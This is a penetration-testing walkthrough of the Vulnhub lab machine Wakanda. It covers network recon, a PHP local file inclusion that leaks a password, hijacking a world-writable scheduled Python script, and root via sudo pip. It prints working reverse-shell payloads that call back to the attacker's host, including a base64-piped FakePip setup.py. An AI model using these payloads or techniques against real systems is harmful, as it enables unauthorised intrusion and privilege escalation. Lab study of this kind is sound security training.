Vulnhub machine Wakanda: penetration test walkthrough
Introduction
Wakanda is a new marketplace site that will go live soon. Your goal is to use hacking techniques to find the exact location of the "vibranium".
This Vulnhub machine was developed by xMagass and is hosted on Vulnhub; it packs a number of neat tricks.
Baidu Netdisk download:
Link: https://pan.baidu.com/s/1xwr1li8sJ-Yc7h_jOtVOcw  Password: aixl
Difficulty: intermediate.
Import Wakanda_1.ova into VirtualBox, set its network adapter to Bridged, and pick an adapter that has network access (in my case the wireless adapter, shown in the screenshot as Intel(R) Dual Band Wireless-AC 7260).
1. Identify the target's IP address with arp-scan
Because both Kali and the Wakanda VM run in bridged mode, they sit on the same LAN. First check Kali's own address with ip a, then list the other live hosts on that LAN with netdiscover or arp-scan.
(1) Check Kali's IP address with ip a
root@kali:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 08:00:27:e2:40:00 brd ff:ff:ff:ff:ff:ff
    inet 192.168.0.104/24 brd 192.168.0.255 scope global dynamic eth0
       valid_lft 5339sec preferred_lft 5339sec
    inet6 fe80::a00:27ff:fee2:4000/64 scope link
       valid_lft forever preferred_lft forever
Kali's address and mask on eth0 are 192.168.0.104/24.
(2) List the live hosts on the LAN
root@kali:~# netdiscover -i eth0
 Currently scanning: 192.168.10.0/16   |   Screen View: Unique Hosts

 7 Captured ARP Req/Rep packets, from 5 hosts.   Total size: 420
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.0.1     24:69:68:22:e8:1e      3     180  TP-LINK TECHNOLOGIES CO.,LTD.
 192.168.0.103   6c:29:95:10:38:1c      1      60  Intel Corporate
 192.168.0.106   08:00:27:ac:03:43      1      60  PCS Systemtechnik GmbH
 192.168.0.100   bc:9f:ef:df:b6:e6      1      60  Unknown vendor
 192.168.0.102   2c:61:f6:88:ae:9c      1      60  Unknown vendor
root@kali:~#
root@kali:~# arp-scan -l
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
192.168.0.1     24:69:68:22:e8:1e       (Unknown)
192.168.0.103   6c:29:95:10:38:1c       Intel Corporate
192.168.0.106   08:00:27:ac:03:43       CADMUS COMPUTER SYSTEMS
192.168.0.101   44:c3:46:11:5b:07       (Unknown)
192.168.0.100   bc:9f:ef:df:b6:e6       (Unknown)

8 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9: 256 hosts scanned in 2.253 seconds (113.63 hosts/sec). 5 responded
The host whose NIC resolves to CADMUS COMPUTER SYSTEMS is the target, at 192.168.0.106. The MAC prefix 08:00:27 is the VirtualBox OUI; depending on the tool's vendor database it shows up as CADMUS COMPUTER SYSTEMS (arp-scan), PCS Systemtechnik GmbH (netdiscover) or Oracle VirtualBox virtual NIC (nmap), so any Vulnhub VM running in VirtualBox will carry one of those labels.
2. Enumeration and initial information gathering
A full TCP port scan with Nmap turned up only one interesting web application, the site announcing the upcoming vibranium marketplace. There is also an SSH service on a non-default port (3333 instead of 22).
(1) Full nmap port scan
root@kali:~# nmap -sS -p- 192.168.0.106
Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2018-09-20 09:56 CST
Nmap scan report for localhost (192.168.0.106)
Host is up (0.000096s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE
80/tcp    open  http
111/tcp   open  rpcbind
3333/tcp  open  dec-notes
59197/tcp open  unknown
MAC Address: 08:00:27:AC:03:43 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 3.15 seconds
The scan shows a web server on port 80 and SSH on port 3333. Nmap's "dec-notes" label for 3333 is just the name from its port table, not a fingerprint; a -sV scan or the banner from a manual connect identifies the service as SSH (the login later in this walkthrough confirms it). Ports 111 (rpcbind) and 59197 were not pursued.
(2) Scan the website with Nikto
root@kali:~# nikto -h http://192.168.0.106/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.0.106
+ Target Hostname:    192.168.0.106
+ Target Port:        80
+ Start Time:         2018-09-20 09:12:14 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ Server leaks inodes via ETags, header found with file /icons/README, fields: 0x13f4 0x438c034968a80
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7535 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2018-09-20 09:13:28 (GMT8) (74 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Nikto reports only missing security headers and an ETag inode leak: nothing exploitable and no useful information disclosure.
(3) Directory enumeration
Since nikto found nothing useful, brute-force directory names with dirb. In China tools such as Yujian (御劍) are popular, but since this is an overseas target it is simplest to stick with the standard Kali tools.
root@kali:~# dirb http://192.168.0.106/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Thu Sep 20 09:19:02 2018
URL_BASE: http://192.168.0.106/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.0.106/ ----
+ http://192.168.0.106/admin (CODE:200|SIZE:0)
+ http://192.168.0.106/backup (CODE:200|SIZE:0)
+ http://192.168.0.106/index.php (CODE:200|SIZE:1527)
+ http://192.168.0.106/secret (CODE:200|SIZE:0)
+ http://192.168.0.106/server-status (CODE:403|SIZE:301)
+ http://192.168.0.106/shell (CODE:200|SIZE:0)

-----------------
END_TIME: Thu Sep 20 09:19:05 2018
DOWNLOADED: 4612 - FOUND: 6
Visiting http://192.168.0.106/admin, /backup, /secret and the other hits returns nothing (note the SIZE:0 in the dirb output).
(4) Inspect the page source
The page source contains a commented-out element with a useful hint:
<!-- <a class="nav-link active" href="?lang=fr">Fr</a> -->
In ?lang=fr, lang is a language switch (sites often support several languages, e.g. English, French, Chinese) and fr selects French. Add this parameter to the URL to switch the language to French.
The English text switches to French:
Original English text: Next opening of the largest vibranium market. The products come directly from the wakanda. stay tuned!
French text: Prochaine ouverture du plus grand marché du vibranium. Les produits viennent directement du wakanda. Restez à l'écoute!
From past penetration testing experience, a parameter like this that selects a file to load is a classic candidate for local file inclusion (LFI) or remote file inclusion (RFI).
3. Reading source code through the LFI
Trying URLs such as http://192.168.0.106/?lang=index gave nothing useful, because the included file is executed as PHP rather than displayed. So try a PHP stream wrapper instead: http://192.168.0.106/?lang=php://filter/convert.base64-encode/resource=index
This returns the source of index.php base64-encoded (base64 is an encoding, not encryption); decoding it reveals a password.
<?php
$password ="Niamey4Ever227!!!" ;//I have to remember it
if (isset($_GET['lang']))
{
include($_GET['lang'].".php");
}
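To make both sides of this finding concrete, here is an added Python example (not code from the walkthrough, the Wakanda VM or FreeBuf) that models the vulnerable include from the recovered index.php, the php://filter payload that turns it into source disclosure, and an allowlist resolver as the fix. The base URL, the simulated server response and the fixed language-to-file map (en and fr, matching index.php and fr.php in the web root) are assumptions constructed for the example.

```python
import base64
import re
from urllib.parse import urlencode

# Assumption for the example: the site ships only English (index.php) and
# French (fr.php), the two PHP files seen in /var/www/html.
ALLOWED_LANGS = {"en": "index.php", "fr": "fr.php"}


def filter_payload(resource):
    """Value for ?lang= that makes include() read `resource`.php through
    php://filter and emit it base64-encoded instead of executing it."""
    return "php://filter/convert.base64-encode/resource=" + resource


def build_url(base, resource):
    """Full request URL; urlencode escapes the ':' '/' '=' of the wrapper."""
    return base + "/?" + urlencode({"lang": filter_payload(resource)})


def vulnerable_include_target(lang):
    """What the recovered index.php does: include($_GET['lang'].".php") with
    no validation, so wrappers and traversal reach include() untouched."""
    return lang + ".php"


def hardened_include_target(lang):
    """Allowlist fix: the parameter selects a key, never a path. Anything not
    in the map, including php://filter/... and ../, is rejected."""
    if lang not in ALLOWED_LANGS:
        raise ValueError("unsupported language: %r" % lang)
    return ALLOWED_LANGS[lang]


def is_rejected(lang):
    """True when the hardened resolver refuses `lang`."""
    try:
        hardened_include_target(lang)
    except ValueError:
        return True
    return False


def decode_filter_output(body):
    """Turn the base64 blob returned for a php://filter request back into PHP."""
    return base64.b64decode(body.strip()).decode()


def extract_password(php_source):
    """Pull the value of $password out of recovered PHP source; assumes the
    single double-quoted assignment seen in the walkthrough."""
    m = re.search(r'\$password\s*=\s*"([^"]*)"', php_source)
    return m.group(1) if m else None


# Constructed stand-in for the server's reply to the filter request: the
# relevant lines of the recovered index.php, base64-encoded as PHP would.
SAMPLE_SOURCE = ('<?php\n$password = "Niamey4Ever227!!!"; //I have to remember it\n'
                 'if (isset($_GET[\'lang\'])) { include($_GET[\'lang\'].".php"); }\n')
SAMPLE_RESPONSE = base64.b64encode(SAMPLE_SOURCE.encode()).decode()


if __name__ == "__main__":
    print(build_url("http://192.168.0.106", "index"))
    print(extract_password(decode_filter_output(SAMPLE_RESPONSE)))
```

The same payload builder works for any other PHP file on the host (fr.php, or a config file once its name is known), and the allowlist version shows why the fix is a lookup rather than a filter on "php://" or "../": a denylist leaves every other wrapper and encoding open.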
The site has no login panel, so try the password against the SSH service. After root, admin and similar usernames failed, the site footer, Made by @mamadou, suggested the username mamadou.
root@kali:~# ssh mamadou@192.168.0.106 -p 3333
The authenticity of host '[192.168.0.106]:3333 ([192.168.0.106]:3333)' can't be established.
ECDSA key fingerprint is SHA256:X+fXjgH34Ta5l6I4kUSpiVZNBGGBGtjxZxgyU7KCFwk.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[192.168.0.106]:3333' (ECDSA) to the list of known hosts.
mamadou@192.168.0.106's password:

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Sep 19 06:26:23 2018 from kali
Python 2.7.9 (default, Jun 29 2016, 13:08:31)
[GCC 4.9.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> ls
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
NameError: name 'ls' is not defined
>>>
4. Obtaining sensitive information
(1) Switching to a bash environment
After logging in, mamadou's login shell turns out to be python rather than /bin/bash (the /etc/passwd entry below confirms /usr/bin/python).
We could run Python statements to gather information from the machine, or use Python to switch to /bin/bash.
>>> import pty
>>> pty.spawn("/bin/bash")
mamadou@Wakanda1:~$ id
uid=1000(mamadou) gid=1000(mamadou) groups=1000(mamadou)
mamadou@Wakanda1:~$
The two statements import pty and pty.spawn("/bin/bash") drop us into bash.
(2) The first flag
The first flag is in mamadou's home directory.
mamadou@Wakanda1:~$ pwd
/home/mamadou
mamadou@Wakanda1:~$ ls -lar
total 24
-rw-r--r-- 1 mamadou mamadou  675 Aug  1 13:15 .profile
-rw-r--r-- 1 mamadou mamadou   41 Aug  1 15:52 flag1.txt
-rw-r--r-- 1 mamadou mamadou 3515 Aug  1 13:15 .bashrc
-rw-r--r-- 1 mamadou mamadou  220 Aug  1 13:15 .bash_logout
lrwxrwxrwx 1 root    root       9 Aug  5 02:24 .bash_history -> /dev/null
drwxr-xr-x 4 root    root    4096 Aug  1 15:23 ..
drwxr-xr-x 2 mamadou mamadou 4096 Sep 19 06:28 .
mamadou@Wakanda1:~$ cat flag1.txt
Flag : d86b9ad71ca887f4dd1dac86ba1c4dfc
Next, search the rest of the filesystem for flags. Note that --name is not a valid find predicate (GNU find rejects it with "unknown predicate"); the correct form is -name:
mamadou@Wakanda1:~$ find / -name "*flag*" 2>/dev/null
Beyond flag1.txt this does not get mamadou any further: find can list names in world-readable directories such as /home/devops (see below), but cannot read files mamadou lacks permission for, and it cannot enter directories such as /root at all.
The web root /var/www/html holds nothing useful either.
mamadou@Wakanda1:~$ cd /var/www/html/
mamadou@Wakanda1:/var/www/html$ ls -la
total 4572
drwxr-xr-x 2 root root    4096 Aug  1 16:51 .
drwxr-xr-x 3 root root    4096 Aug  1 13:29 ..
-rw-r--r-- 1 root root       0 Aug  1 16:50 admin
-rw-r--r-- 1 root root       0 Aug  1 16:50 backup
-rw-r--r-- 1 root root 4510077 Aug  1 14:26 bg.jpg
-rw-r--r-- 1 root root  140936 Aug  1 14:07 bootstrap.css
-rw-r--r-- 1 root root    1464 Aug  1 14:29 cover.css
-rw-r--r-- 1 root root     141 Aug  1 16:45 fr.php
-rw-r--r-- 1 root root       0 Aug  1 16:50 hahaha
-rw-r--r-- 1 root root       0 Aug  1 16:51 hohoho
-rw-r--r-- 1 root root    1811 Aug  1 16:44 index.php
-rw-r--r-- 1 root root       0 Aug  1 16:50 secret
-rw-r--r-- 1 root root      40 Aug  1 16:51 secret.txt
-rw-r--r-- 1 root root       0 Aug  1 16:50 shell
-rw-r--r-- 1 root root       0 Aug  1 16:50 troll
mamadou@Wakanda1:/var/www/html$ cat secret.txt
Congratulations! Nope! I am joking....
The admin and other decoy files that dirb reported are all zero bytes, with no content.
(3) Check whether the user has sudo rights
mamadou@Wakanda1:~$ sudo -l
[sudo] password for mamadou:
Sorry, user mamadou may not run sudo on Wakanda1.
mamadou has no sudo rights.
5. Leveraging another user's privileges
(1) Look for other users
Next, check whether the machine has other users.
mamadou@Wakanda1:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
Debian-exim:x:104:109::/var/spool/exim4:/bin/false
messagebus:x:105:110::/var/run/dbus:/bin/false
statd:x:106:65534::/var/lib/nfs:/bin/false
avahi-autoipd:x:107:113:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
mamadou:x:1000:1000:Mamadou,,,,Developper:/home/mamadou:/usr/bin/python
devops:x:1001:1002:,,,:/home/devops:/bin/bash
This reveals another user, devops. Check its home directory for sensitive information:
mamadou@Wakanda1:~$ cd /home/devops/
mamadou@Wakanda1:/home/devops$ ls -la
total 28
drwxr-xr-x 3 devops developer 4096 Sep 19 06:50 .
drwxr-xr-x 4 root   root      4096 Aug  1 15:23 ..
lrwxrwxrwx 1 root   root         9 Aug  5 02:25 .bash_history -> /dev/null
-rw-r--r-- 1 devops developer  220 Aug  1 15:23 .bash_logout
-rw-r--r-- 1 devops developer 3515 Aug  1 15:23 .bashrc
-rw-r----- 1 devops developer   42 Aug  1 15:57 flag2.txt
-rw-r--r-- 1 devops developer  675 Aug  1 15:23 .profile
mamadou@Wakanda1:/home/devops$ cat flag2.txt
cat: flag2.txt: Permission denied
There is a flag2.txt, but mamadou is not permitted to read it (mode -rw-r-----, group developer). Switching to that user would need its password, which we do not have, so another route is needed.
(2) Information gathering
In /tmp there is a freshly created file named test:
mamadou@Wakanda1:~$ cd /tmp
mamadou@Wakanda1:/tmp$ ls -laR
.:
total 32
drwxrwxrwt  7 root   root      4096 Sep 19 21:42 .
drwxr-xr-x 22 root   root      4096 Aug  1 13:05 ..
drwxrwxrwt  2 root   root      4096 Sep 19 20:49 .font-unix
drwxrwxrwt  2 root   root      4096 Sep 19 20:49 .ICE-unix
-rw-r--r--  1 devops developer    4 Sep 19 21:46 test
drwxrwxrwt  2 root   root      4096 Sep 19 20:49 .Test-unix
drwxrwxrwt  2 root   root      4096 Sep 19 20:49 .X11-unix
drwxrwxrwt  2 root   root      4096 Sep 19 20:49 .XIM-unix
mamadou@Wakanda1:/tmp$ date
Wed Sep 19 21:47:59 EDT 2018
The modification time of test is Sep 19 21:46, noticeably later than that of the other entries; the date command shows the machine's current time as Wed Sep 19 21:47:59, so test was written within the last two minutes. That suggests a scheduled job on the machine periodically (re)creates it.
The script responsible turns up in /srv:
mamadou@Wakanda1:/tmp$ cd /srv/
mamadou@Wakanda1:/srv$ ls -la
total 12
drwxr-xr-x  2 root   root      4096 Aug  1 17:52 .
drwxr-xr-x 22 root   root      4096 Aug  1 13:05 ..
-rw-r--rw-  1 devops developer   37 Sep 19 21:49 .antivirus.py
mamadou@Wakanda1:/srv$ cat .antivirus.py
open('/tmp/test','w').write('test')
The file .antivirus.py is a Python script owned by devops, group developer, and its mode (-rw-r--rw-) makes it writable by everyone. The devops user evidently runs it on a schedule (the job itself, presumably a cron entry, is not visible to mamadou; the regular rewrite of /tmp/test is the evidence), so modifying its contents should give us a reverse shell as devops.
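The manual hunt above (a world-writable file that belongs to another user and gets executed by that user) generalises into a check worth running from any low-privilege shell. The Python below is an added example, not part of the walkthrough or the Wakanda VM: it walks a tree and reports regular files the caller can write without owning them, and the demo() function builds a constructed directory in a temp dir (an .antivirus.py with the same -rw-r--rw- mode, plus a read-only and a group-writable file) and scans it as an arbitrary non-owner identity, uid 12345 with no groups, so that it runs offline without chown.

```python
import os
import stat
import sys
import tempfile


def find_hijackable(root, my_uid=None, my_gids=None):
    """Regular files under `root` that the given identity can write although
    it does not own them: the .antivirus.py situation (a devops-owned script
    with o+w that a devops process later executes).

    Returns (path, owner_uid, rwx-string) tuples. The identity defaults to the
    calling process. Symlinks are not followed (os.lstat), so a decoy such as
    .bash_history -> /dev/null is judged by its own mode, not its target's.
    """
    if my_uid is None:
        my_uid = os.getuid()
    if my_gids is None:
        my_gids = set(os.getgroups()) | {os.getgid()}
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # vanished or unreadable entry (e.g. under /proc)
            if not stat.S_ISREG(st.st_mode) or st.st_uid == my_uid:
                continue  # not a file, or already ours: nothing to hijack
            other_w = bool(st.st_mode & stat.S_IWOTH)
            group_w = st.st_gid in my_gids and bool(st.st_mode & stat.S_IWGRP)
            if other_w or group_w:
                hits.append((path, st.st_uid, stat.filemode(st.st_mode)))
    return hits


def demo():
    """Constructed tree in a temp dir, scanned as uid 12345 (arbitrary, not
    the file owner) first with no groups, then as a member of the files'
    group. Returns the two sorted lists of matching file names."""
    base = tempfile.mkdtemp()
    srv = os.path.join(base, "srv")
    os.mkdir(srv)
    cases = {
        ".antivirus.py": 0o646,  # -rw-r--rw-, the mode seen on the target
        "readonly.py": 0o644,    # -rw-r--r--, the normal case
        "groupw.py": 0o664,      # -rw-rw-r--, writable only via the group
    }
    for name, mode in cases.items():
        path = os.path.join(srv, name)
        with open(path, "w") as fh:
            fh.write("open('/tmp/test','w').write('test')\n")
        os.chmod(path, mode)
    files_gid = os.lstat(os.path.join(srv, "groupw.py")).st_gid

    def names(hits):
        return sorted(os.path.basename(p) for p, _, _ in hits)

    no_group = find_hijackable(base, my_uid=12345, my_gids=set())
    same_group = find_hijackable(base, my_uid=12345, my_gids={files_gid})
    return names(no_group), names(same_group)


if __name__ == "__main__":
    # Real use from the low-privilege shell: python3 this.py / 2>/dev/null
    root = sys.argv[1] if len(sys.argv) > 1 else "/"
    for path, owner, mode in find_hijackable(root):
        print(mode, owner, path)
```

Every hit still needs the second half of the question answered by hand (does anyone actually execute this file, and as whom?), which on Wakanda the timestamps in /tmp settled.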
Set up a reverse shell
Edit the Python script and append a reverse-shell payload:
mamadou@Wakanda1:/srv$ vi .antivirus.py
mamadou@Wakanda1:/srv$ cat .antivirus.py
open('/tmp/test','w').write('test')
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.0.104",1235))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])
Then listen on port 1235 and wait for the target to connect back:
root@kali:~# nc -lvvp 1235
After a few minutes the shell connects, and with it comes the second flag.
root@kali:~# nc -lvvp 1235
listening on [any] 1235 ...
connect to [192.168.0.104] from localhost [192.168.0.106] 60823
bash: cannot set terminal process group (1107): Inappropriate ioctl for device
bash: no job control in this shell
devops@Wakanda1:/$ id
uid=1001(devops) gid=1002(developer) groups=1002(developer)
devops@Wakanda1:/$ cd
devops@Wakanda1:~$ pwd
/home/devops
devops@Wakanda1:~$ ls -la
total 28
drwxr-xr-x 3 devops developer 4096 Sep 19 06:50 .
drwxr-xr-x 4 root   root      4096 Aug  1 15:23 ..
lrwxrwxrwx 1 root   root         9 Aug  5 02:25 .bash_history -> /dev/null
-rw-r--r-- 1 devops developer  220 Aug  1 15:23 .bash_logout
-rw-r--r-- 1 devops developer 3515 Aug  1 15:23 .bashrc
-rw-r----- 1 devops developer   42 Aug  1 15:57 flag2.txt
-rw-r--r-- 1 devops developer  675 Aug  1 15:23 .profile
devops@Wakanda1:~$ cat flag2.txt
Flag 2 : d8ce56398c88e1b4d9e5f83e64c79098
6. Escalating to root
The final goal is root.
(1) Check the devops user's sudo rights
devops@Wakanda1:/$ sudo -l
Matching Defaults entries for devops on Wakanda1:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User devops may run the following commands on Wakanda1:
    (ALL) NOPASSWD: /usr/bin/pip
devops can run exactly one command through sudo without a password: /usr/bin/pip. I had not met this before; after some searching I found a suitable technique, the fakepip exploit, whose README explains the usage clearly. The underlying problem is not a bug in pip but the sudo rule itself: pip install executes the package's setup.py, so root runs whatever Python we put in it.
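Rules like this one are easy to miss in a longer sudo -l listing, so here is an added example (not code from the walkthrough or from the FakePip project) that parses sudo -l output and flags rules granting root an unrestricted binary known to execute arbitrary code. The set of such binaries is an illustrative assumption, not an exhaustive list; the sample output is a constructed copy of the devops listing above with two extra rules added to show what is and is not flagged.

```python
import os
import re

# Binaries that let a sudo invocation run arbitrary commands as the target
# user even though no shell is granted: pip runs setup.py from the package it
# installs, the others are well-known shell escapes. Illustrative subset,
# an assumption of this example rather than an exhaustive list.
SHELL_ESCAPE_BINARIES = {
    "pip", "pip2", "pip3", "python", "python2", "python3",
    "vi", "vim", "less", "more", "find", "awk", "perl",
    "bash", "sh", "env", "tar", "zip",
}

# "(runas[:group]) TAG: TAG: /path/cmd args, /path/other" as sudo -l prints it.
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(text):
    """Parse the rule section of `sudo -l` into (runas, nopasswd, command)
    tuples. Lines before the 'User ... may run the following commands'
    header (the Defaults block) are ignored. Commands are split on ','
    which is how sudo separates them; a comma inside an argument would
    need quoting in sudoers and is not handled here."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            rules.append((m.group("runas").strip(), nopasswd, cmd.strip()))
    return rules


def risky_rules(rules):
    """Rules that hand root (runas ALL or root) either ALL or an unrestricted
    shell-escape binary. A rule that pins the arguments is not flagged here,
    although it still deserves a manual look."""
    out = []
    for runas, nopasswd, cmd in rules:
        target_user = runas.split(":")[0].strip()
        if target_user not in ("ALL", "root"):
            continue
        if cmd == "ALL":
            out.append((runas, nopasswd, cmd))
            continue
        words = cmd.split()
        binary = os.path.basename(words[0])
        if binary in SHELL_ESCAPE_BINARIES and len(words) == 1:
            out.append((runas, nopasswd, cmd))
    return out


# Constructed copy of the devops listing, plus two rules that are not flagged:
# pinned arguments for non-escape binaries, and an escape binary as www-data.
SAMPLE_SUDO_L = """\
Matching Defaults entries for devops on Wakanda1:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User devops may run the following commands on Wakanda1:
    (ALL) NOPASSWD: /usr/bin/pip
    (root) /usr/bin/apt-get update, /usr/bin/systemctl restart apache2
    (www-data) NOPASSWD: /usr/bin/python
"""

if __name__ == "__main__":
    for rule in risky_rules(parse_sudo_l(SAMPLE_SUDO_L)):
        print("RISKY:", rule)
```

In a real engagement feed it the captured output of sudo -l; on the defensive side the same check over sudoers exports is how a rule like (ALL) NOPASSWD: /usr/bin/pip gets caught before a pentester does.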
(2) Abusing sudo pip install
Editing the exploit on the target is awkward, so download it on Kali, edit it there, and upload it to the target.
A. Download
root@kali:~# mkdir FakePip
root@kali:~# cd FakePip/
root@kali:~/FakePip# wget https://raw.githubusercontent.com/0x00-0x00/FakePip/master/setup.py
--2018-09-20 10:30:04--  https://raw.githubusercontent.com/0x00-0x00/FakePip/master/setup.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.108.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 983 [text/plain]
Saving to: 'setup.py'

setup.py            100%[============================>]     983  --.-KB/s    in 0s

2018-09-20 10:30:05 (4.20 MB/s) - 'setup.py' saved [983/983]
B. Change the callback address
Change the line RHOST = '10.0.0.1' # change this in setup.py to Kali's IP address, in my case 192.168.0.104.
root@kali:~/FakePip# vi setup.py
root@kali:~/FakePip# cat setup.py
from setuptools import setup
from setuptools.command.install import install
import base64
import os


class CustomInstall(install):
    def run(self):
        install.run(self)
        RHOST = '192.168.0.104'  # change this
        reverse_shell = 'python -c "import os; import pty; import socket; lhost = \'%s\'; lport = 443; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((lhost, lport)); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); os.putenv(\'HISTFILE\', \'/dev/null\'); pty.spawn(\'/bin/bash\'); s.close();"' % RHOST
        encoded = base64.b64encode(reverse_shell)
        os.system('echo %s|base64 -d|bash' % encoded)


setup(name='FakePip',
      version='0.0.1',
      description='This will exploit a sudoer able to /usr/bin/pip install *',
      url='https://github.com/0x00-0x00/fakepip',
      author='zc00l',
      author_email='[email protected]',
      license='MIT',
      zip_safe=False,
      cmdclass={'install': CustomInstall})
C. Start a SimpleHTTPServer with python
root@kali:~/FakePip# python -m SimpleHTTPServer 8888
Serving HTTP on 0.0.0.0 port 8888 ...
python -m SimpleHTTPServer 8888 starts a minimal HTTP server on Kali (this is the Python 2 module; on Python 3 the equivalent is python3 -m http.server 8888), from which the target can download setup.py.
D. Download the exploit
As the devops user on the target, download setup.py.
devops@Wakanda1:~$ mkdir fakepip
devops@Wakanda1:~$ cd fakepip
devops@Wakanda1:~/fakepip$ wget http://192.168.0.104:8888/setup.py
--2018-09-19 22:34:45--  http://192.168.0.104:8888/setup.py
Connecting to 192.168.0.104:8888... connected.
HTTP request sent, awaiting response... 200 OK
Length: 988 [text/plain]
Saving to: 'setup.py'

     0K                                                  100%  127M=0s

2018-09-19 22:34:45 (127 MB/s) - 'setup.py' saved [988/988]

devops@Wakanda1:~/fakepip$ ls
setup.py
The script downloaded successfully.
E. Listen on port 443 on Kali
root@kali:~/FakePip# nc -lvvp 443
F. Run the exploit and catch the reverse shell
Running sudo /usr/bin/pip install . --upgrade --force-reinstall on the target makes root execute setup.py, and the reverse shell appears on Kali. The setup.py payload connects to port 443, which is hard-coded as lport; the 1235 listener from the previous step is unrelated.
devops@Wakanda1:~/fakepip$ sudo /usr/bin/pip install . --upgrade --force-reinstall
Unpacking /home/devops/fakepip
  Running setup.py (path:/tmp/pip-G7z4Td-build/setup.py) egg_info for package from file:///home/devops/fakepip

Installing collected packages: FakePip
  Found existing installation: FakePip 0.0.1
    Uninstalling FakePip:
      Successfully uninstalled FakePip
  Running setup.py install for FakePip
The reverse shell on Kali runs as root, the highest privilege.
root@kali:~/FakePip# nc -lvvp 443
listening on [any] 443 ...
connect to [192.168.0.104] from localhost [192.168.0.106] 55143
root@Wakanda1:/tmp/pip-G7z4Td-build# id
uid=0(root) gid=0(root) groups=0(root)
